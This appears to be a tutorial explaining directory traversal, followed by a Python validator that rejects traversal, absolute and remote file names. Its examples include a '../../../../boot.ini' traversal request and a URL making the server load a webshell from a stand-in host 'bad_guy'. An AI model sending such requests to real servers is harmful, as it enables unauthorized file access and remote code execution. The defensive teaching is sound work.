Directory Traversal
A directory traversal, sometimes called path traversal, is when an attacker attempts to access files outside of the main web root directory. When a server is vulnerable to directory traversal, the attacker can gain broad access to it: not only the ability to read the contents of files but also, potentially, the ability to run arbitrary commands, depending on what they can access.
Basic Example
http://vulnerable_site.com/get_file.asp?file=file.pdf
If vulnerable_site.com were affected by directory traversal, and let’s say the attacker wanted the boot.ini file in C:\, they could then theoretically request:
http://vulnerable_site.com/get_file.asp?file=../../../../boot.ini
This becomes much more dangerous when the attacker is able to reach binaries that can run code, or to have the server load files from outside sources:
http://vulnerable_site.com/get_file.asp?file=http://bad_guy/webshell.asp
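A server-side check that accepts the first request above and rejects the other two, shown as an added example in Python rather than code from the original page. The names `resolve_download`, `is_allowed`, `RejectedPath` and the directory `/srv/app/files` are assumptions made for illustration.

```python
import os
import re

BASE_DIR = "/srv/app/files"  # assumed download directory (not from the page)
# scheme://host/... or //host/... asks the server to fetch from elsewhere
_REMOTE = re.compile(r"^(?:[a-zA-Z][a-zA-Z0-9+.-]*:)?//")
# C:\... or C:/... is a drive-qualified absolute path
_DRIVE = re.compile(r"^[a-zA-Z]:")


class RejectedPath(ValueError):
    """The requested name does not resolve to a file under the base directory."""


def resolve_download(file_param, base_dir=BASE_DIR):
    """Map the already URL-decoded `file` value to a path inside base_dir."""
    if not file_param or "\x00" in file_param:
        raise RejectedPath("empty name or NUL byte")
    # Treat both separators alike so ..\..\boot.ini is seen as traversal.
    name = file_param.replace("\\", "/")
    if _REMOTE.match(name):
        raise RejectedPath("remote location")
    if _DRIVE.match(name) or name.startswith("/"):
        raise RejectedPath("absolute path")
    base = os.path.realpath(base_dir)
    # realpath collapses ../ and follows symlinks before the comparison.
    target = os.path.realpath(os.path.join(base, name))
    if target == base or os.path.commonpath([base, target]) != base:
        raise RejectedPath("escapes base directory")
    return target


def is_allowed(file_param, base_dir=BASE_DIR):
    try:
        resolve_download(file_param, base_dir)
        return True
    except RejectedPath:
        return False


if __name__ == "__main__":
    # The three `file` values from the URLs above.
    for value in ("file.pdf", "../../../../boot.ini",
                  "http://bad_guy/webshell.asp"):
        print(f"{value!r}: {'allowed' if is_allowed(value) else 'rejected'}")
```

The comparison is made on the resolved path, not on the raw string, so a name such as `reports/../file.pdf` is still served while anything that lands outside the base directory is refused.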